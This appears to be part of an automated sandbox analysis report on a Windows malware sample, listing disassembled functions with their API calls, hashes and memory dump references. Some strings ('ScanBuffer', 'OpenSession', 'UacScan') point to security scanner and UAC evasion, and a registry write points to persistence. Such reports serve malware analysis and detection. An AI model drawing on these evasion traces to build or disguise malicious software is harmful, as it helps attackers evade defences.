GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02CA5CF4,?,?,02CA3880,00000001), ref: 02CA5C36

Part of subcall function 02C97D10: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02CA3880,02CA5C76,00000000,02CA5CF4,?,?,02CA3880), ref: 02C97D5E

Part of subcall function 02C97F18: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02CA3880,02CA5C91,00000000,02CA5CF4,?,?,02CA3880,00000001), ref: 02C97F37

GetLastError.KERNEL32(00000000,02CA5CF4,?,?,02CA3880,00000001), ref: 02CA5C9B

Part of subcall function 02C9A6F8: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,02C9C359,00000000,02C9C3B3), ref: 02C9A717

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: CreateErrorFileLast$FormatFullMessageNamePath
String ID:
API String ID: 503785936-0
Opcode ID: bff559249df21a560e5ff8a24dc9ff6989e7ad8fcb8451321120955b4a7f031a
Instruction ID: 0f88e191bd4a6d1e029cfbc11c576315dc4aee47d3b99e9cb859f76f0901a41d
Opcode Fuzzy Hash: bff559249df21a560e5ff8a24dc9ff6989e7ad8fcb8451321120955b4a7f031a
Instruction Fuzzy Hash: 86318F70E007499FDF00EFA8C9957AEB7B6AB48308F908565E504AB380D7755E05DFA1

Function 02CAE6B6 Relevance: 4.6, APIs: 3, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,00000000,02DE5914), ref: 02CAE6FC
RegSetValueExA.ADVAPI32(00000864,00000000,00000000,00000001,00000000,0000001C,00000000,02CAE767), ref: 02CAE734
RegCloseKey.ADVAPI32(00000864,00000864,00000000,00000000,00000001,00000000,0000001C,00000000,02CAE767), ref: 02CAE73F

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: CloseOpenValue
String ID:
API String ID: 779948276-0
Opcode ID: 8d2ab0732ba26a37b492859b13c3f091d18a6d4347ea805978dbec2f74fde842
Instruction ID: b49673f47631b3373e3e5709825fe2d8288eaa5de6243e7cf1b019642e1a6674
Opcode Fuzzy Hash: 8d2ab0732ba26a37b492859b13c3f091d18a6d4347ea805978dbec2f74fde842
Instruction Fuzzy Hash: 2A113D71600204AFEF14FBA8DD959AE77ADEB09758F910470F504DB350D730DE01EA60

Function 02CAE6B8 Relevance: 4.6, APIs: 3, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,00000000,02DE5914), ref: 02CAE6FC
RegSetValueExA.ADVAPI32(00000864,00000000,00000000,00000001,00000000,0000001C,00000000,02CAE767), ref: 02CAE734
RegCloseKey.ADVAPI32(00000864,00000864,00000000,00000000,00000001,00000000,0000001C,00000000,02CAE767), ref: 02CAE73F

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: CloseOpenValue
String ID:
API String ID: 779948276-0
Opcode ID: 40c360e3f5e964c2cd6dc0ffae7ab97a5cd5bf77633187613c0904942d75abd8
Instruction ID: 58015641dacef580eb8d0a38b19394c815977d1c763065c84c7c372e6bb6ec87
Opcode Fuzzy Hash: 40c360e3f5e964c2cd6dc0ffae7ab97a5cd5bf77633187613c0904942d75abd8
Instruction Fuzzy Hash: 1D113D71600204AFEF14FBA8DD959AE77ADEB09758F910470F504DB350D730DE01EA60

Function 02C9E2E4 Relevance: 4.5, APIs: 3, Instructions: 45COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 02C9E2F3

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: a6e321520108b45d33e9babc7bbfe37725b9992f1c09c531e9a3f23f032f5071
Instruction ID: fa28889487df51a1091b2c7f53011dc2ba9b7b4c11f35941b8980259e743d3d1
Opcode Fuzzy Hash: a6e321520108b45d33e9babc7bbfe37725b9992f1c09c531e9a3f23f032f5071
Instruction Fuzzy Hash: 10F0C231708210C79F24FB3ACE8C679239A7F64B047445427E40E9B205CF24CE05DB62

Function 02C94CFC Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(02CAE948), ref: 02C94C1A
SysAllocStringLen.OLEAUT32(?,?), ref: 02C94D07
SysFreeString.OLEAUT32(00000000), ref: 02C94D19

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 5a5438c59bf50d5a9d2d1f0a3350fd82e771d5cb0ff699e6fe957ce0256f5644
Instruction ID: 89a85f912c691efae0ed0fce1ea743dba7b8a1a82597d5ff29e9e71896b5bef2
Opcode Fuzzy Hash: 5a5438c59bf50d5a9d2d1f0a3350fd82e771d5cb0ff699e6fe957ce0256f5644
Instruction Fuzzy Hash: ABE012B8105A026EEF283F219C59B37372AAFC1745B18449AE804CA154D774C442FD74

Function 02CA705C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 02CA735A

Strings

H, xrefs: 02CA7111

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: FreeString
String ID: H
API String ID: 3341692771-2852464175
Opcode ID: 76235247960270cfea758635c98e51c70504a3a0e80a78c3e23a1b394b59e46d
Instruction ID: 78ca306247cb40c5af4aa4979542ca748420d5513865151d85191f5db03b1f6d
Opcode Fuzzy Hash: 76235247960270cfea758635c98e51c70504a3a0e80a78c3e23a1b394b59e46d
Instruction Fuzzy Hash: 6DB1D174A01609DFDB10CF99D890A9DFBF6FF89318F258269E809AB364D730A945CF50

Function 02C9E6E0 Relevance: 3.1, APIs: 2, Instructions: 63COMMON

Download Yara Rule

APIs

VariantCopy.OLEAUT32(00000000,00000000), ref: 02C9E701

Part of subcall function 02C9E2E4: VariantClear.OLEAUT32(?), ref: 02C9E2F3

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: Variant$ClearCopy
String ID:
API String ID: 274517740-0
Opcode ID: 09554983ddfe989b91fcc6a406bb9f7b5f0cdf1627038da94f8f8e9afeaaf919
Instruction ID: 77eecf159daa9005ea527fd1b486c96c753418ea45c708ea2a74b20ace884f1b
Opcode Fuzzy Hash: 09554983ddfe989b91fcc6a406bb9f7b5f0cdf1627038da94f8f8e9afeaaf919
Instruction Fuzzy Hash: 9011A17070021097CF34EF6AC9CCA6677D6AFA57517044467EA4E8B245DB32CC41DBA3

Function 02C9E37C Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 02C9E3BC

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: InitVariant
String ID:
API String ID: 1927566239-0
Opcode ID: 2b5c01b638429bbd25027ef201300728a0add60f21b6e37ea75f06e01a39da27
Instruction ID: c766397b04a95918a52e8cdec7d92583f8e18e81044e077b1e0ab81825817f47
Opcode Fuzzy Hash: 2b5c01b638429bbd25027ef201300728a0add60f21b6e37ea75f06e01a39da27
Instruction Fuzzy Hash: 5B315E72A00218EBEF10DFE9C88CAAA77E9FB5D704F444562E909D3240D330DA90CBA1

Function 02CA6CEC Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(00000000,?,00000000,02CA6D39,?,?,?,00000000), ref: 02CA6D19

Part of subcall function 02C94C0C: SysFreeString.OLEAUT32(02CAE948), ref: 02C94C1A

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: FreeFromProgString
String ID:
API String ID: 4225568880-0
Opcode ID: 1bc85330fa237bd57c255a797252283405e9d5108e430fa670812d8c175761c5
Instruction ID: 9b8357425cbd06375e605ce979ef531098786f9fdc80a60e72a4420949ae7959
Opcode Fuzzy Hash: 1bc85330fa237bd57c255a797252283405e9d5108e430fa670812d8c175761c5
Instruction Fuzzy Hash: 1FE09236604708BFEF25FBA9CC66D5A77EDDB89B54B6104B1E800D7600EA75AE00A860

Function 02C95814 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(02C90000,?,00000105), ref: 02C95832

Part of subcall function 02C95A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02C90000,02CBD790), ref: 02C95A94
Part of subcall function 02C95A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02C90000,02CBD790), ref: 02C95AB2
Part of subcall function 02C95A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02C90000,02CBD790), ref: 02C95AD0
Part of subcall function 02C95A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02C95AEE
Part of subcall function 02C95A78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02C95B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02C95B37
Part of subcall function 02C95A78: RegQueryValueExA.ADVAPI32(?,02C95CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02C95B7D,?,80000001), ref: 02C95B55
Part of subcall function 02C95A78: RegCloseKey.ADVAPI32(?,02C95B84,00000000,?,?,00000000,02C95B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02C95B77

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: Open$FileModuleNameQueryValue$Close
String ID:
API String ID: 2796650324-0
Opcode ID: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
Instruction ID: 1f3c8c374d54fbff8e9a2aafd767657d0992d5ebf2562e3c05b569b20c7d337c
Opcode Fuzzy Hash: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
Instruction Fuzzy Hash: 47E06D71A402149FCF10DF5888C4A5637D8AF08790F440565EC58DF34AD3B0DA108BD4

Function 02C97D94 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02C97DA8

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
Instruction ID: e02c43f2dd59dec1c61d1a162d8b2671d3427478910f4939f7be2e3370a8f263
Opcode Fuzzy Hash: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
Instruction Fuzzy Hash: B1D05BB23191107AD620955E5C44EFB5BDCCFC9770F100639B658C31C0D7208C0587B1

Function 02C97E10 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,02CAF8C4,ScanString,02CF137C,02CBAFD0,OpenSession,02CF137C,02CBAFD0,ScanString,02CF137C,02CBAFD0,UacScan,02CF137C,02CBAFD0,UacInitialize), ref: 02C97E1B

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 23fb81311ad07fae81732db0edde70c56cded36c5311baf0953a0f48c8330ef0
Instruction ID: 7c5a315255a1d30d9eeb7249d685addd62d40c4b6074fa7cae3585d0a18e1b99
Opcode Fuzzy Hash: 23fb81311ad07fae81732db0edde70c56cded36c5311baf0953a0f48c8330ef0
Instruction Fuzzy Hash: B5C08CF06232820E1E64A1FC0CCC12A528C1B841383A42F21E238DA2E2D321882B7420

Function 02C97E34 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,02CB2A41,ScanString,02CF137C,02CBAFD0,OpenSession,02CF137C,02CBAFD0,ScanBuffer,02CF137C,02CBAFD0,OpenSession,02CF137C,02CBAFD0,Initialize), ref: 02C97E3F

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: fe3f8c7547375d3b190e2bd7b8d67a4577ec7d15bc45dec9ccb4955a6e8d04a7
Instruction ID: f86e490776688ca98eed5f47a2836f6c8d9085418e8d4e54f237b1213f30bbe5
Opcode Fuzzy Hash: fe3f8c7547375d3b190e2bd7b8d67a4577ec7d15bc45dec9ccb4955a6e8d04a7
Instruction Fuzzy Hash: 72C08CF06232040E5E60A2FC0CCC60A628C1B841383A02F21E138C61D2D321D86B3410

Function 02C94C24 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 02C94C37

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: ec55763b5f82d1328600eb73f4eb151786d68f8a69a22224f81dbc62eca26ecd
Instruction ID: 37d732be9bb689d63a6a0870b92b2e3cded4987edf094fa01e0ba3531762206a
Opcode Fuzzy Hash: ec55763b5f82d1328600eb73f4eb151786d68f8a69a22224f81dbc62eca26ecd
Instruction Fuzzy Hash: 31C012B2600A244BEF355A989CC475562CCEB45295B1800A1D408D7245E3A0DD019664

Function 02CBBB48 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

timeSetEvent.WINMM(00002710,00000000,02CBBB3C,00000000,00000001), ref: 02CBBB58

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: Eventtime
String ID:
API String ID: 2982266575-0
Opcode ID: 6e8a69f4701abab6e5fbb4191b747862230051a831e5bf8809814990fb506c87
Instruction ID: 2efed931856ec88f3866c05175573ac1b06f253a851920dbc95d706e3a58a5cf
Opcode Fuzzy Hash: 6e8a69f4701abab6e5fbb4191b747862230051a831e5bf8809814990fb506c87
Instruction Fuzzy Hash: B6C092F07807407EFE10AAA92CC2F631A8DDB08B04F600412BA10EE2C3D1E24D609A30

Function 02C94BE4 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON

Download Yara Rule

APIs

SysAllocStringLen.OLEAUT32(00000000,?), ref: 02C94BEB

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: 45a3375204cc73dd1af73f008c830e5c9ef88422045493d1b6915fbd8ee49b80
Instruction ID: 9fa4b86ff74e8e4b6ec2575c401267c9d00d9d6f1ea812d75dfeac7a7fe58871
Opcode Fuzzy Hash: 45a3375204cc73dd1af73f008c830e5c9ef88422045493d1b6915fbd8ee49b80
Instruction Fuzzy Hash: 48B0127C248A0328FF3835620E0DB32008C0BD1287F8800D1DE28C80C0FF40C112D833

Function 02C94BFC Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 02C94C03

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: 6fc0f88f0b4d12cbeda0546aa3c9b2a61d9b338520cfab902635a24ef7a42f2a
Instruction ID: 79af4f4e1232c76488e7ce09e845708d66da25f451bb09ab10fbaea7cd4437df
Opcode Fuzzy Hash: 6fc0f88f0b4d12cbeda0546aa3c9b2a61d9b338520cfab902635a24ef7a42f2a
Instruction Fuzzy Hash: ABA022BC000F038E8F2F332C000802A22333FE03823CEC0E800002A0088F3A8000FC30

Function 02C915CC Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02C91A03,?,02C91FC1), ref: 02C915E2

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5d89ce4d9c3e032f0911c0918031ef27fa8408b9cfb2e596885dac92f8ec1f27
Instruction ID: 16883101e026a629c354a3d889afedd114f01e6521b5eb4e6905e0bd5d22c094
Opcode Fuzzy Hash: 5d89ce4d9c3e032f0911c0918031ef27fa8408b9cfb2e596885dac92f8ec1f27
Instruction Fuzzy Hash: BCF0F9F0B513018FEF05DF79994A3057AD6E789394F148679D709DF398E7B194128B10

Function 02C91682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02C91FC1), ref: 02C916A4

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
